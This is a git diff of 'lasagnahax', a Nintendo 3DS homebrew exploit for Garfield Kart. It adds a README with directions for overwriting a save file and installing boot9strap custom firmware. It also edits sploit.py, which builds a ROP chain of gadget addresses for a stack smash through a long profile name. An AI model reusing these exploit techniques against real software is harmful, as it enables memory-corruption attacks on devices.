diff --git a/Garfield.sav b/Garfield.sav deleted file mode 100644 index a04bdac..0000000 Binary files a/Garfield.sav and /dev/null differ diff --git a/README.md b/README.md index b51cb28..132c36b 100644 --- a/README.md +++ b/README.md @@ -1 +1,19 @@ -# lasagnahax \ No newline at end of file +# lasagnahax +- Secondary userland exploit for Garfield Kart EU and US + +# Thanks +- Tuxsh for mentioning the exploitability of this title on discord. +- Tuxsh [Universal Otherapp](https://github.com/TuxSH/universal-otherapp) +- Yellows8 [3ds_ropkit](https://github.com/yellows8/3ds_ropkit) + +# Directions +0) These directions are intended for experienced 3DS homebrew users only. There are more convenient exploits at https://3ds.hacks.guide for the general public. +1) Copy the Garfield.sav release file and overwrite your current save file of the same name. Checkpoint and JKSV can do this. This will erase your save data. +2) Set up [SafeB9SInstaller](https://github.com/d0k3/SafeB9SInstaller/releases) to your SD card. The SafeB9SInstaller.bin file needs to be on the SD root. +3) Make a boot9strap folder and put [boot9strap.firm](https://github.com/SciresM/boot9strap/releases/tag/1.3) and boot9strap.firm.sha inside of it. +4) Boot the game and a. tap the lower left icon b. tap garfield's head (not the X beside his head) c. tap the gear icon. This should load universal-otherapp and then safeB9SInstaller. +5) Proceed with installing boot9strap. You know what to do next since you're the experienced user noted in step 0. + +# Exploit + +Stack smash via long profile name string in savegame.
\ No newline at end of file diff --git a/sploit.py b/sploit.py index ac0785a..af6a7ef 100644 --- a/sploit.py +++ b/sploit.py @@ -8,7 +8,7 @@ POPPC=0x00114aec POP_R0PC=0x0015be1c POP_R1PC=0x00151650 -POP_R0R4PC=0x0010974c #: pop {r0, r1, r2, r3, r4, pc} +POP_R0R4PC=0x0010974c ROP_STR_R0TOR1=0x0013b098 FILE=0x00230800 @@ -23,26 +23,11 @@ OPEN=0x001521f8+4 READ=0x0011df78+4 -SP=0x0ffffcb8 # address of ropkit in bss -#SP=ARCH-6 +SP=0x0ffffcb8 # address of initial rop on stack PC=POPPC -READOP_FIX=0x00121c88 -TERM_FIX=0x0015b480 -#0x0015b480 : mov r0, #0 ; str r0, [r4] ; pop {r4, pc} ; -#0x00121c88 : mov r1, #1 ; str r1, [r0] ; bx lr -#0x00132d10 : mov r0, lr ; pop {r4, r5, r6, r7, r8, sb, sl, pc} -#0x001469e0 : str lr, [r0, #0xc] ; pop {pc} "in deep development on a number of key projects" -#0x0015e8a0 : str lr, [r0, #4] ; nop ; pop {r4, pc} -#0x001007bc : ldmdb r6, {r0, r2, r5, r6, ip, sp, lr, pc} - - -''' -with open("payload.bin","rb") as f: - ropkit=f.read() -with open("otherapp.bin","rb") as f: - otherapp=f.read() -''' +READOP_FIX=0x00121c88 # : mov r1, #1 ; str r1, [r0] ; bx lr +TERM_FIX=0x0015b480 # : mov r0, #0 ; str r0, [r4] ; pop {r4, pc} ; def write32(gadget_addr, file_offset): global filename @@ -111,23 +96,4 @@ def rop(gadget_addr): rop( DEST+0x2e0) rop(POP_R1PC) rop( POPPC) -rop(STACK_PIVOT) -''' -rop(POP_R0PC) -rop( FILENAME-4) -rop(POP_R1PC) -rop( POPPC) -rop(STACK_PIVOT) -''' - - - - -''' -write32(LEVEL_ADDR, 0x1CC, "0a") - -write32(JUMP_ADDR, 0x1720, "0") -write32(STACK_PIVOT, 0x171C, "0") -write32(SP, 0x1738, "0") -write32(PC, 0x1740, "0") -''' +rop(STACK_PIVOT) \ No newline at end of file